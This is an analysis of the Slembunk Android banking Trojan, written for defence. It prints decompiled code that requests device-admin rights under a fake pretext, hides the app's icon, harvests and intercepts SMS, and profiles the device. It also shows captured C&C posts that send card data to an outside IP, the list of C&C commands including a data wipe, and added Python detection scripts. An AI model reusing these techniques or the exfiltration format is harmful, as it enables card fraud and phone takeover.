Slembunk Trojan

Slembunk was first reported by FireEye, and several other security companies have since published their own analyses. We obtained a sample, analyzed the Trojan's design and build on that work here. The sample disguises itself as other common Android applications and tricks users into entering credit-card-related sensitive information. We analyze it step by step.

1 Malicious behaviour

1.1 Wake lock

The Trojan acquires a PARTIAL_WAKE_LOCK (flag value 1). With this lock held the CPU keeps running even after the screen is turned off, until the code explicitly releases it.

```java
public void onCreate() {
    super.onCreate();
    // PARTIAL_WAKE_LOCK (1): the CPU stays on with the screen off, regardless of the power button
    this.mWakeLock = ((PowerManager) this.getSystemService("power")).newWakeLock(1, "MyWakeLock");
    this.mWakeLock.acquire();
}
```

1.2 Device administrator

The Trojan asks for device-administrator rights. If it is not already an active admin, it launches the system confirmation dialog: EXTRA_DEVICE_ADMIN carries the admin receiver component and EXTRA_ADD_EXPLANATION the text shown to the user, here the misleading "Get Video Codec Access".

```java
public void checkDeviceAdmin() {
    ComponentName v0 = new ComponentName((Context) this, MyDeviceAdminReceiver.class);
    if (!this.deviceManager.isAdminActive(v0)) {
        Intent v1 = new Intent("android.app.action.ADD_DEVICE_ADMIN");
        v1.putExtra("android.app.extra.DEVICE_ADMIN", (Parcelable) v0);
        // pretext displayed in the system dialog
        v1.putExtra("android.app.extra.ADD_EXPLANATION", "Get Video Codec Access");
        this.startActivity(v1);
    }
}
```

1.3 Hiding the icon

After installation, once the device-admin permission is granted, the Trojan hides its launcher icon. The icon-hiding code has a small trick: the condition is obfuscated, which makes it awkward to read in smali, but once decompiled to Java it is obviously an always-true branch.

```java
// "3".equals("3") is always true: an obfuscated unconditional branch
if (("3".equals("3")) || ("3".equals("1"))) {
    // COMPONENT_ENABLED_STATE_DISABLED (2) with DONT_KILL_APP (1): the launcher icon disappears
    this.getPackageManager().setComponentEnabledSetting(new ComponentName(this, Main.class), 2, 1);
}
```

1.4 Scheduled relaunch

An AlarmManager alarm re-sends the com.slempo.service.activities.HTMLStart broadcast after restartTimeMinutes, carrying the same "VALUES" extra, so the fake page keeps coming back.

```java
private void scheduleLaunch() {
    Calendar v0 = Calendar.getInstance();
    v0.add(12, this.restartTimeMinutes);   // 12 == Calendar.MINUTE
    Intent v1 = new Intent("com.slempo.service.activities.HTMLStart");
    v1.putExtra("VALUES", this.getIntent().getStringExtra("VALUES"));
    // AlarmManager.RTC (0): fire the broadcast at the computed wall-clock time
    this.am.set(0, v0.getTimeInMillis(), PendingIntent.getBroadcast((Context) this, 0, v1, 0));
}
```

1.5 Checking the running application

Slembunk decides whether to show the credit-card phishing page according to the application currently in the foreground:

```java
private String getTopRunning() {
    List v1 = ((ActivityManager) this.getSystemService("activity")).getRunningTasks(1);
    // package name of the top task, or "" when nothing is running
    String v3 = !v1.isEmpty() ? ((ActivityManager.RunningTaskInfo) v1.get(0)).topActivity.getPackageName() : "";
    return v3;
}
```

1.6 Reading the SMS inbox

The inbox is read through the SMS content provider and serialized into a JSON array of sender, body and date:

```java
public static String readMessagesFromDeviceDB(Context context) {
    Cursor v8;
    Uri v1 = Uri.parse("content://sms/inbox");
    String[] v2 = new String[] {"_id", "address", "body", "date"};
    JSONArray v12 = new JSONArray();
    try {
        v8 = context.getContentResolver().query(v1, v2, null, null, null);
        // the decompiler's goto/label_55 structure is written here as a plain loop with the same behaviour
        if (v8 != null && v8.moveToFirst()) {
            do {
                String v6 = v8.getString(v8.getColumnIndex("address"));
                String v7 = v8.getString(v8.getColumnIndex("body"));
                // the format() argument is garbled in the extracted text; it formats the "date" column (reconstructed)
                String v9 = new SimpleDateFormat("dd-MM-yyyy HH:mm:ss", Locale.US)
                        .format(new Date(Long.parseLong(v8.getString(v8.getColumnIndex("date")))));
                JSONObject v13 = new JSONObject();
                v13.put("Address", v6);   // key name not legible in the extracted text; assumed
                v13.put("Body", v7);
                v13.put("Date", v9);
                v12.put(v13);
            } while (v8.moveToNext());
        }
    }
    // the rest of the method (catch block and the return of the JSON string) is not preserved in the extracted page
```

1.7 Getting the phone number

```java
public static String getPhoneNumber(Context context) {
    String v0 = ((TelephonyManager) context.getSystemService("phone")).getLine1Number();
    if (v0 == null || v0.equals("")) {
        v0 = "";
    }
    return v0;
}
```

1.8 Getting the device ID

The IMEI is read first; if it is empty or the all-zero value an emulator reports, the Trojan falls back to ANDROID_ID and then to Build.SERIAL:

```java
public static String getDeviceId(Context context) {
    String v1;
    String v0 = ((TelephonyManager) context.getSystemService("phone")).getDeviceId();
    // as decompiled: equals("") is evaluated before the null check, so a null IMEI would throw here
    if ((v0.equals("")) || v0 == null || (v0.equals("000000000000000"))) {
        v0 = Settings.Secure.getString(context.getContentResolver(), "android_id");
        if (v0 != null && !v0.equals("")) {
            return v0;
        }
        v0 = Build.SERIAL;
        if (v0 != null && !v0.equals("") && !v0.equalsIgnoreCase("unknown")) {
            return v0;
        }
        v1 = "not available";
    } else {
        v1 = v0;
    }
    return v1;
}
```

1.9 Starting at boot

The Trojan registers to start at boot and also listens for the external SD card becoming available, so it is started again once the card is mounted.

(manifest excerpt not preserved in the extracted page: two receiver elements whose intent-filters register android.intent.action.BOOT_COMPLETED and android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE)

1.10 Listening for SMS

The C&C server sends its commands to the Trojan via SMS. As the AndroidManifest.xml shows, the Trojan registers an SMS receiver whose priority is higher than the system SMS application's, so it sees incoming messages first.

(manifest excerpt not preserved in the extracted page: a receiver whose intent-filter registers android.provider.Telephony.SMS_RECEIVED with a high android:priority)

Here is the receiver's onReceive method:

```java
public void onReceive(Context context, Intent intent) {
    SharedPreferences v8 = context.getSharedPreferences("AppRefs", 0);
    Object v1 = new HashSet();
    try {
        // the blocked-number set is kept serialized in the preferences
        v1 = DataWraper.deserialize(v8.getString("blocked_numbers", DataWraper.serialize(new HashSet())));
    } catch (Exception v2) {
        v2.printStackTrace();
    }
    Map v3 = SendSmsReceiver.retrieveMessages(intent);   // sender -> message text
    Iterator v10 = v3.keySet().iterator();
    while (v10.hasNext()) {
        Object v7 = v10.next();
        CommandCenter v6 = new CommandCenter((String) v3.get(v7), "", context);
        if (v6.processCommand()) {
            // a C&C command: the broadcast is aborted so the SMS app never sees it
            this.abortBroadcast();
            continue;
        }
        boolean v4 = v6.needToInterceptIncoming();
        boolean v5 = v6.needToListen();
        if (!v4 && !((HashSet) v1).contains(v7)) {
            if (!v5) {
                continue;
            }
            // listen mode: forward a copy of the message, but let it through
            SendData.sendListenedIncomingSms(context, (String) v3.get(v7), (String) v7);
            continue;
        }
        // intercept mode or blocked sender: forward the message and drop it
        SendData.sendInterceptedIncomingSms(context, (String) v3.get(v7), (String) v7);
        this.abortBroadcast();
    }
}
```

2 Trojan workflow

In AndroidManifest.xml the Trojan registers receivers for five actions: SMS_RECEIVED, ACTION_EXTERNAL_APPLICATIONS_AVAILABLE, BOOT_COMPLETED, DEVICE_ADMIN_ENABLED and com.slempo.service.activities.HTMLStart. It also declares several activities and one service: apart from the main activity, the activities are the phishing pages, and the service launches the matching activity and requests device-admin rights. A simplified view of the code flow:
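As an added example (not code from this page or from the Trojan), the following Python script performs the manifest triage this section suggests: it parses a decoded AndroidManifest.xml (for instance as produced by apktool) and reports receivers registered for the actions named above, the android:priority on any SMS_RECEIVED filter, and the SMS and telephony permissions requested. The manifest embedded in the script is constructed for the example; its package and receiver names are placeholders, not the sample's.

```python
"""Static triage of a decoded AndroidManifest.xml for the receiver pattern
described above (added example; the embedded manifest is constructed and its
package/receiver names are placeholders, not Slembunk's)."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Actions the analysis reports the Trojan registering, with the reason each matters.
WATCHED_ACTIONS = {
    "android.provider.Telephony.SMS_RECEIVED": "receives incoming SMS before the default app",
    "android.intent.action.BOOT_COMPLETED": "restarts at boot",
    "android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE": "restarts when the SD card is mounted",
    "android.app.action.DEVICE_ADMIN_ENABLED": "device-admin receiver (hard to uninstall)",
}

# Permissions that, together with the receivers above, enable SMS interception and device profiling.
WATCHED_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
    "android.permission.READ_PHONE_STATE",
    "android.permission.WAKE_LOCK",
}

# Constructed sample manifest with the same shape as the one described in the text.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.placeholder">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Placeholder">
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".RestartReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def receiver_findings(manifest_xml):
    """One finding per (receiver, watched action) pair, with the filter priority if set."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for receiver in root.iter("receiver"):
        for flt in receiver.findall("intent-filter"):
            priority = _attr(flt, "priority")
            for action in flt.findall("action"):
                name = _attr(action, "name")
                if name in WATCHED_ACTIONS:
                    findings.append({
                        "receiver": _attr(receiver, "name"),
                        "action": name,
                        "priority": int(priority) if priority is not None else None,
                        "why": WATCHED_ACTIONS[name],
                    })
    return findings


def watched_permissions(manifest_xml):
    """Sorted list of the requested permissions that are on the watch list."""
    root = ET.fromstring(manifest_xml)
    requested = {_attr(p, "name") for p in root.findall("uses-permission")}
    return sorted(requested & WATCHED_PERMISSIONS)


def is_sms_interceptor(findings):
    """True when an SMS_RECEIVED receiver sets an explicit priority: the precondition
    for abortBroadcast() hiding messages from the default SMS app."""
    return any(f["action"].endswith("SMS_RECEIVED") and (f["priority"] or 0) > 0 for f in findings)


if __name__ == "__main__":
    found = receiver_findings(SAMPLE_MANIFEST)
    for f in found:
        print("%s: %s (priority=%s) - %s" % (f["receiver"], f["action"], f["priority"], f["why"]))
    print("watched permissions:", watched_permissions(SAMPLE_MANIFEST))
    print("SMS interceptor:", is_sms_interceptor(found))
```

A single BOOT_COMPLETED receiver is common in benign apps; the combination reported here (prioritised SMS receiver plus restart hooks plus a device-admin receiver plus SMS permissions) is what makes a sample worth a closer look.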

The main activity launches the MainServiceStart service. That service starts three threads that poll periodically: one checks the foreground application and launches the fake credit-card screen, one requests DeviceAdmin rights, and one evaluates received commands and launches the matching fake page. The service also sends the phone number, IMEI and other sensitive information to the C&C server. The request looks like this:

```http
POST / HTTP/1.1
Content-Length: 481
Content-Type: text/plain; charset=utf-8
Host: 181.174.164.25:2080
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

{"OS": "4.0.4", "Model": "Unknown SDK", "Phone Number": "15555215554", "APPS": ["com.android.gesture.builder", "com.android.widgetpreview", "com.example.android.apis", "com.example.android.livecubes", "com.example.android.softkeyboard", "com.joeykrim.rootcheck", "de.robv.android.xposed.installer", "de.robv.android.xposed.installer.staticbusybox", "eu.slempo.supersu", "org.slempo.service"], "IMEI": "8f986e65d50f299a", "Client Number": "3", "Type": "Device Info", "Operator": "310260", "<key not legible in the extracted text>": "US"}
```

The phone number 15555215554 is the Android emulator's default line number and the app list includes Xposed and a root checker, so this capture was made in an analysis emulator; the "IMEI" field carries a 16-character hexadecimal ANDROID_ID, the fallback from 1.8 for the emulator's all-zero IMEI. As noted in 1.5, the Trojan decides whether to show the fake credit-card page according to the currently running application. The fake page looks like this (screenshot not preserved on this page):
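The two C&C messages on this page (the device-info beacon above and the card-data submission further on) share a shape that is easy to match on a proxy or in captured traffic: a POST to / on a bare IP:port, the unversioned Apache HttpClient user agent, JSON declared as text/plain, and a top-level "Type" of "Device Info" or "User Data". The Python below is an added example, not the page's or the Trojan's code; the requests embedded in it are constructed with placeholder values (documentation IP ranges, a test card number) but follow the captured layout.

```python
"""Detection logic for the Slembunk beacon and card-data POSTs described in the
analysis (added example, not the Trojan's or the page's code; sample requests
are constructed)."""
import json
import re

# Default user agent of Apache HttpClient 4.x when no version is compiled in;
# the capture on the page shows it verbatim.
HTTPCLIENT_DEFAULT_UA = "apache-httpclient/unavailable (java 1.4)"
SLEMBUNK_TYPES = {"Device Info", "User Data"}
DEVICE_INFO_KEYS = {"IMEI", "Client Number", "APPS", "Phone Number", "OS"}
BARE_IP_PORT = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d{1,5}$")


def parse_http_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body.strip()


def classify_request(raw):
    """Return (verdict, indicators). Two or more indicators give 'slembunk_c2'."""
    request_line, headers, body = parse_http_request(raw)
    indicators = []
    if request_line.startswith("POST / ") and BARE_IP_PORT.match(headers.get("host", "")):
        indicators.append("POST to / on a bare IP:port")
    if headers.get("user-agent", "").lower() == HTTPCLIENT_DEFAULT_UA:
        indicators.append("unversioned Apache HttpClient user agent")
    try:
        payload = json.loads(body)
    except ValueError:
        payload = None
    if isinstance(payload, dict):
        if headers.get("content-type", "").lower().startswith("text/plain"):
            indicators.append("JSON body declared as text/plain")
        if payload.get("Type") in SLEMBUNK_TYPES:
            indicators.append("message type %r" % payload["Type"])
        if DEVICE_INFO_KEYS.issubset(payload):
            indicators.append("device inventory (IMEI, phone number, installed apps)")
        data = payload.get("data")
        if isinstance(data, dict) and isinstance(data.get("Card"), dict):
            indicators.append("card data (number, CVC, expiry) in body")
    verdict = "slembunk_c2" if len(indicators) >= 2 else "no_match"
    return verdict, indicators


# Constructed: same layout as the device-info beacon on the page, placeholder values.
SAMPLE_BEACON = (
    "POST / HTTP/1.1\r\n"
    "Content-Type: text/plain; charset=utf-8\r\n"
    "Host: 203.0.113.5:2080\r\n"
    "Connection: Keep-Alive\r\n"
    "User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)\r\n"
    "\r\n"
    + json.dumps({"OS": "4.0.4", "Model": "sdk", "Phone Number": "15555215554",
                  "APPS": ["com.example.app"], "IMEI": "000000000000000",
                  "Client Number": "3", "Type": "Device Info", "Operator": "310260"})
)

# Constructed: same layout as the card-data POST, with a well-known test card number.
SAMPLE_CARD_POST = (
    "POST / HTTP/1.1\r\nContent-Type: text/plain; charset=utf-8\r\nHost: 203.0.113.5:2080\r\n"
    "User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)\r\n\r\n"
    + json.dumps({"data": {"Type": "Card Information",
                           "Card": {"CVC": "000", "Month": "12", "Year": "15",
                                    "Number": "4111 1111 1111 1111"}},
                  "Type": "User Data", "Code": "-1"})
)

# Constructed benign request: JSON to a named host with a normal UA and content type.
SAMPLE_BENIGN = (
    "POST /api/v1/sync HTTP/1.1\r\nHost: api.example.com\r\nContent-Type: application/json\r\n"
    "User-Agent: okhttp/3.12.0\r\n\r\n" + json.dumps({"Type": "sync", "cursor": 42})
)

if __name__ == "__main__":
    for name, req in (("beacon", SAMPLE_BEACON), ("card", SAMPLE_CARD_POST), ("benign", SAMPLE_BENIGN)):
        print(name, classify_request(req))
```

Any one of these indicators on its own is weak (plenty of old Android apps ship the unversioned HttpClient user agent), which is why the verdict requires at least two; the message-type and body-structure checks are the ones specific to this family.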

The Trojan author validates the entered data strictly. First, the user information must be complete and the credit-card details must be valid; second, the expiry year must be between 2014 and 2020. The billing-address page then enforces a strict association between the ZIP code and the phone number (in the capture below, area code 212 and ZIP 10002 are both New York). Once everything is filled in, the data is sent to the C&C host. The request looks like this:

```http
POST / HTTP/1.1
Content-Length: 401
Content-Type: text/plain; charset=utf-8
Host: 181.174.164.25:2080
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

{"data": {"Additional Information": {"<key not legible in the extracted text>": "123456", "VBV Password": "qwerty"}, "Type": "Card Information", "Card": {"CVC": "393", "Month": "12", "Year": "15", "Number": "4024 0238 6573 0515"}, "Billing Address": {"Date of Birth": "01.03.1990", "Phone Number": "212-925-2355", "Street Address": "Dalianganjinzi", "Zip Code": "10002", "Phone Prefix": "<value not legible in the extracted text>", "Name on Card": "zhanghua"}}, "Type": "User Data", "Code": "-1"}
```

Appendix: C&C commands

```java
CommandCenter.commands.add("#intercept_sms_start");
CommandCenter.commands.add("#intercept_sms_stop");
CommandCenter.commands.add("#block_numbers");
CommandCenter.commands.add("#unblock_all_numbers");
CommandCenter.commands.add("#unblock_numbers");
CommandCenter.commands.add("#lock");
CommandCenter.commands.add("#unlock");
CommandCenter.commands.add("#send" + "_sms");        // split string literal in the source
CommandCenter.commands.add("#forward" + "_calls");   // split string literal in the source
CommandCenter.commands.add("#disable_forward_calls");
CommandCenter.commands.add("#control_number");
CommandCenter.commands.add("#update_html");
CommandCenter.commands.add("#show_html");
CommandCenter.commands.add("#wipe_data");
```
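As an added triage helper (not the Trojan's code), the Python below scans SMS text for the command tokens listed above, writing the split strings ("#send" + "_sms", "#forward" + "_calls") out as they exist at runtime, and rates each hit by impact. The sample messages and sender numbers are constructed; the argument format after a token is not documented on this page, so the rest of the body is simply kept alongside the hit.

```python
"""Find Slembunk C&C command tokens in SMS text (added example, not the
Trojan's code; sample messages are constructed)."""
import re

# The command set registered in CommandCenter, with the split literals joined as at runtime.
SLEMBUNK_COMMANDS = {
    "#intercept_sms_start", "#intercept_sms_stop", "#block_numbers",
    "#unblock_all_numbers", "#unblock_numbers", "#lock", "#unlock",
    "#send_sms", "#forward_calls", "#disable_forward_calls",
    "#control_number", "#update_html", "#show_html", "#wipe_data",
}

# Commands whose effect is destructive or directly monetisable; "#lock"/"#unlock"
# also collide with ordinary hashtags, so they rate lower.
HIGH_IMPACT = {"#wipe_data", "#intercept_sms_start", "#forward_calls", "#send_sms",
               "#update_html", "#show_html"}

TOKEN = re.compile(r"#[A-Za-z_]+")


def find_commands(text):
    """Known command tokens in a message, lower-cased, in order of appearance."""
    return [t.lower() for t in TOKEN.findall(text) if t.lower() in SLEMBUNK_COMMANDS]


def triage_messages(messages):
    """messages: iterable of (sender, body). Returns the messages carrying a command,
    each with its tokens and a severity derived from HIGH_IMPACT."""
    hits = []
    for sender, body in messages:
        cmds = find_commands(body)
        if cmds:
            hits.append({
                "sender": sender,
                "commands": cmds,
                "severity": "high" if any(c in HIGH_IMPACT for c in cmds) else "low",
                "body": body,
            })
    return hits


# Constructed sample: two command messages, one hashtag false positive, one ordinary SMS.
SAMPLE_MESSAGES = [
    ("+15550001111", "#intercept_sms_start"),
    ("+15550002222", "#block_numbers 15550009999,15550008888"),
    ("+15550003333", "Dinner at 8? #lock the door when you leave"),
    ("+15550004444", "Your verification code is 482913"),
]

if __name__ == "__main__":
    for hit in triage_messages(SAMPLE_MESSAGES):
        print("%s %s from %s: %s" % (hit["severity"], hit["commands"], hit["sender"], hit["body"]))
```

Because processCommand() is followed by abortBroadcast() in the receiver shown in 1.10, command messages never reach the default SMS application, so an inbox dump from the infected device will not contain them; this scanner is meant for carrier-side or MDM message logs, or for messages recovered from the app's own storage.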